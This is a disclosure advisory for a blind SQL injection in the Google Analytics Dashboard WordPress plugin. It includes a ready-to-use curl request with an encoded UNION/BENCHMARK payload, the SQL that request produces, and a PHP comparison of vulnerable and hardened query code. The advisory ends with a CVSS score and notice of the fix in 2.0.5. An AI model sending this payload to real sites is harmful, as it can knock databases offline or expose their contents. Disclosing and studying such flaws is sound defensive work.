Blind SQL injection in Google Analytics Dashboard could cause denial of service or expose database

Google Analytics Dashboard contains an AJAX handler whose SQL statement is vulnerable to SQL injection. The attacker must be logged in to WordPress for this vulnerability to be exploited.

The statement does not return any data to the browser, but an appropriately crafted request could be used to cause a denial of service.

The following request:

curl -i -b $WORDPRESS_SESSION_COOKIE 'http://wordpress.local/wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=%34%36%20%75%6E%69%6F%6E%20%61%6C%6C%20%73%65%6C%65%63%74%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%2C%6D%64%35%28%30%78%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%29%29'

Would cause this SQL statement to be run:

SELECT count(1) FROM wp_posts WHERE post_status = 'draft' AND ID = 46 union all select benchmark(1000000000000000000000,md5(0x4646464646464646464646464646464646));

This would make the MySQL server spend a very long time generating MD5 hashes, causing it to stop responding to legitimate queries.

An attacker who knows or can work out the ID of a draft post could also extract arbitrary data from the database.

The vulnerable query is in gad-admin-pages-posts.php at line 79.
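As an added illustration (not the plugin's own code), the unsafe pattern the advisory describes is shown beside a hardened version that binds the ID with $wpdb->prepare(); the function names, the use of absint() and the error handling are assumptions, and only the query shape is taken from the advisory.

```php
<?php
// Added illustration only: the plugin's real handler is not reproduced here.
// Assumed: function names, use of absint() and $wpdb->prepare(), error handling.
// The query shape (count of draft posts by ID) is the one the advisory shows.

// Unsafe pattern: the pid request parameter is spliced into the SQL string,
// so a value such as "46 union all select ..." becomes part of the statement.
function gad_fill_ppp_unsafe_example() {
    global $wpdb;
    $pid = isset( $_GET['pid'] ) ? $_GET['pid'] : '';
    $sql = "SELECT count(1) FROM {$wpdb->posts} "
         . "WHERE post_status = 'draft' AND ID = " . $pid;
    return $wpdb->get_var( $sql );
}

// Hardened pattern: the ID is coerced to a non-negative integer and bound
// through a %d placeholder, so nothing the client sends can alter the query.
function gad_fill_ppp_hardened_example() {
    global $wpdb;
    // absint() keeps only the leading integer: "46 union ..." becomes 46,
    // and a non-numeric value becomes 0, which is rejected below.
    $pid = isset( $_GET['pid'] ) ? absint( $_GET['pid'] ) : 0;
    if ( 0 === $pid ) {
        wp_send_json_error( array( 'message' => 'invalid post id' ) );
    }
    $sql = $wpdb->prepare(
        "SELECT count(1) FROM {$wpdb->posts} WHERE post_status = 'draft' AND ID = %d",
        $pid
    );
    return (int) $wpdb->get_var( $sql );
}
```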

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:
Score: 7.9 (High)
Access vector: Network
Access complexity: Medium
Authentication: Single
Confidentiality impact: Complete
Integrity impact: None
Availability impact: Complete

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Mitigation/further actions

Version 2.0.5 has been released which addresses this problem; users running older versions should upgrade immediately.